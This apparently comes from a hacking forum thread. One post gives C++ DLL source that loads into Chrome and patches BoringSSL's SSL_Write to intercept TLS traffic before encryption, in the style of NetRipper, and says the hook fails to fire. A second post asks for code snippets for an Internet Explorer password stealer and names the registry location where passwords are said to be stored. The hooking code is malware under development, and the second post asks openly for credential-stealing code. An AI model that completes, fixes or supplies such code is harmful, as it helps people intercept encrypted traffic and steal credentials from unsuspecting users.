zabuz

i have seen several posts about SSL_Write , Netripper and all that, but something really gets me confused when i try to hook it , Maybe, thats what is confusing the other fellow whos been working on it for sometime Today i decided to have a look about Hooking SSL_Write and i decided to try out with source code from rohitab, credits goes to Napalm. my source code looks like this #include "stdafx.h" #include <Windows.h> #include <stdlib.h> #include <stdio.h> using namespace std; struct SECTION_INFO { DWORD dwStartAddress; DWORD dwSize; }; DWORD (*OldSSL_Write)(void *s, const void *buf, int len); BOOL PatchAPI(LPSTR lpszLib, LPSTR lpszFunc, FARPROC *lpOldFunc, FARPROC fpNewFunc) // by Napalm { BOOL bResult = FALSE; DWORD dwProtect; LPBYTE lpPatch; FARPROC fpOldFunc; fpOldFunc = GetProcAddress(LoadLibrary(lpszLib), lpszFunc); if(fpOldFunc){ lpPatch = (LPBYTE)fpOldFunc - 5; if(!memcmp(lpPatch, "\x90\x90\x90\x90\x90\x8B\xFF", 7)){ if(VirtualProtect(lpPatch, 7, PAGE_EXECUTE_READWRITE, &dwProtect)){ *lpPatch = 0xE9; *(LPDWORD)(lpPatch + 1) = (DWORD)((LONG)fpNewFunc - (LONG)fpOldFunc); *(LPDWORD)lpOldFunc = ((DWORD)fpOldFunc + 2); InterlockedExchange((LPLONG)fpOldFunc, (LONG)((*(LPDWORD)fpOldFunc & 0xFFFF0000) | 0xF9EB)); VirtualProtect(lpPatch, 7, dwProtect, NULL); bResult = TRUE; } } } return bResult; } DWORD SearchMemory(void* p_pvStartAddress, DWORD p_dwSize, void *p_pvBuffer, DWORD p_dwBufferSize) { unsigned char *pByte = (unsigned char *)p_pvStartAddress; for(size_t i = 0; i < p_dwSize - p_dwBufferSize; i++) { if(memcmp(pByte + i, p_pvBuffer, p_dwBufferSize) == 0) { return (DWORD)(pByte + i); } } OutputDebugStringA("[ERROR] SearchMemory did not find the pattern!"); return 0; } DWORD SearchMemoryByN(void* p_pvStartAddress, DWORD p_dwSize, void *p_pvBuffer, DWORD p_dwBufferSize, unsigned int p_nN) { unsigned char *pByte = (unsigned char *)p_pvStartAddress; unsigned int n = 0; for(size_t i = 0; i < p_dwSize - p_dwBufferSize; i++) { // Find each occurence and return the N'th one if(memcmp(pByte + i, p_pvBuffer, p_dwBufferSize) == 0) { n++; if(n == p_nN) return (DWORD)(pByte + i); } } OutputDebugStringA("[ERROR] SearchMemory did not find the pattern!"); return 0; } int WINAPI NewSSL_Write(void *s, const void *buf, int len) { return OldSSL_Write(s, buf, len); } SECTION_INFO GetModuleSection(LPCSTR p_sModule, LPCSTR p_sSection) { SECTION_INFO oSectionData = {0, 0}; bool bFound = 0; HANDLE hLib = LoadLibraryA(p_sModule); if (!hLib) { OutputDebugStringA("[ERROR] Cannot Find Chrome.dll\n"); } IMAGE_DOS_HEADER dos; IMAGE_NT_HEADERS ntHeaders; IMAGE_SECTION_HEADER *pSections = NULL; // Get DOS/PE header memcpy(&dos, (void *)p_sModule, sizeof(IMAGE_DOS_HEADER)); memcpy(&ntHeaders, (void *)((DWORD)p_sModule + dos.e_lfanew), sizeof(IMAGE_NT_HEADERS)); // Get sections pSections = new IMAGE_SECTION_HEADER[ntHeaders.FileHeader.NumberOfSections]; if(pSections == NULL) { OutputDebugStringA("[ERROR] Cannot allocate space for sections: "); } // Copy memcpy(pSections, (void *)((DWORD)p_sModule + dos.e_lfanew + sizeof(IMAGE_NT_HEADERS)), ntHeaders.FileHeader.NumberOfSections * sizeof(IMAGE_SECTION_HEADER)); for(size_t j = 0; j < ntHeaders.FileHeader.NumberOfSections; j++) { oSectionData.dwSize = pSections[j].SizeOfRawData; oSectionData.dwStartAddress = (DWORD)p_sModule + pSections[j].VirtualAddress; } return oSectionData; } void HookChromeBoringSSL() { SECTION_INFO rdata = {0, 0}; SECTION_INFO text = {0, 0}; unsigned char PSH_string[] = {0x68, 0x00, 0x00, 0x00, 0x00}; unsigned char SSL_string[] = "c:\\b\\build\\slave\\win\\build\\src\\third_party\\boringssl\\src\\ssl\\ssl_lib.c"; const unsigned int nBytesBeforeRead = 17; const unsigned int nBytesBeforeWrite = 17; const unsigned int READ_IND = 17; const unsigned int WRITE_IND = 15; rdata = GetModuleSection("chrome.dll", ".rdata"); text = GetModuleSection("chrome.dll", ".text"); SearchMemoryByN((void *)text.dwStartAddress, text.dwSize, (void *)PSH_string, 5, READ_IND); SearchMemoryByN((void *)text.dwStartAddress, text.dwSize, (void *)PSH_string, 5, WRITE_IND); if(PatchAPI("chrome.dll", "SSL_Write", (FARPROC *)&OldSSL_Write, (FARPROC)NewSSL_Write)) { MessageBoxA(NULL,"Hooked","",MB_OK); }// Using Napalms Patch } BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch(ul_reason_for_call) { case DLL_PROCESS_ATTACH: HookChromeBoringSSL(); break; case DLL_PROCESS_DETACH: break; case DLL_THREAD_ATTACH: break; case DLL_THREAD_DETACH: break; } return TRUE; } Had to cull a lot of things from Netripper, but i dont see it to pop out the MessageBox,"Hooked " . Started to seem like i dont know what i'm Doing.

hi good morning I need snippets for Internet Explorer stealer, I understand the password are saved to. somewhere like HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Storage I just need snippets for it. I have seen for chrome and Firefox, just need something for it for security testing kindly help